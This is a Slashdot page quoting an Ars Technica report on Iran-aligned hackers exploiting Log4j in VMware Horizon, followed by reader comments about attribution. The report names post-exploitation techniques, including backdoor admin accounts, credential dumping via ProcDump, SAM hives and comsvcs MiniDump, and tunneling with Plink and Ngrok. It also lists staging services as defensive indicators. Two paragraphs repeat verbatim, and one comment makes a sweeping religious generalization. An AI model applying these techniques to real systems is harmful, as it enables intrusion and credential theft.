VMware Horizon Servers Are Under Active Exploit By Iranian State Hackers (arstechnica.com) 17
An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.
Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and adding it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.
The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: Execute reconnaissance commands; Create a backdoor user and adding it to the network administrators group; Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.
The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
Aligned hackers? (Score:4)
Does the ransomware contain pro-Islamic Revolution text?
Are they using Iranian government IP addresses?
Are they government contractors?
What's the link?
Re:Aligned hackers? (Score:4, Interesting)
Details here (Score:5, Informative)
Monica Witt, a US counterintelligence agent, defected to Iran. The Iranian government have her room and board in Iran. Then Iranian hackers started targeting her former co-workers.
You can probably guess who in Iran would want to attack US Navy counterintelligence capabilities, and have the technical chops to do so.
More information can be found in the indictment of Witt. Four Iranians were also indicted and additional details are in those indictments.
https://www.justice.gov/usao-d... [justice.gov]
I link to the indictment because that information has been officially unsealed by the federal court. I'm not revealing any secrets that way. :)
Re: (Score:2)
> You can probably guess who in Iran would want to attack US Navy counterintelligence capabilities,
Besides "everyone"? The US is seen as a dangerously corrupt Western power in Iran, and as the source of the sanctions that limit their nuclear proliferation and hinder other parts of their economy.
Monica Witt's defection is an interesting possibility as a trigger for recent activity, but the motives for Muslim anger with Christian nations and Jewish friendly societies dates back to Mohammed.
All offline (Score:3)
too bad VMware has Linux kernel problems (Score:2)
You can have the latest Linux host or the latest VMware but not both.
Iranian State Hackers? (Score:1)
How do you know? I suspect this is just more war mongering
Any particular reason, any evidence? (Score:3)
Do you have any particular reason to think that? Do you have some evidence that Witt is in some other country, that she left Iran?
The indictments contain about 60 pages of evidence. On the other hand, you have - some idea completely out of your ass, based on nothing?
More information can be found in the indictment of Witt. Four Iranians were also indicted and additional details are in those indictments.
https://www.justice.gov/usao-d... [justice.gov]
I link to the indictment because that information has been officially uns
Re: (Score:2)
HISTORY.
WIKILEAKS.
SNOWDEN.
Yes, plenty of reasons to doubt US claims.
Re: (Score:2)
So, exactly which country do you think Witt is living in?
And again I'll ask for any evidence whatsoever.
You said "Snowden". That would be evidence that the US government was SPYING on international phone calls and therefore *knows* who is involved in these sorts of things.
Re: (Score:2)
Maybe hacking isn't against the law in Iran. Have you checked it?
Re: Any particular reason, any evidence? (Score:1)
Doing paper work to support a lie don't make a lie true. USA is the trouble maker and the liar.
Hackers aligned with the government of Iran? (Score:2)
Re: Hackers aligned with the government of Iran? (Score:2)
Good for them (Score:1)
I wish our government did something to fill budget holes.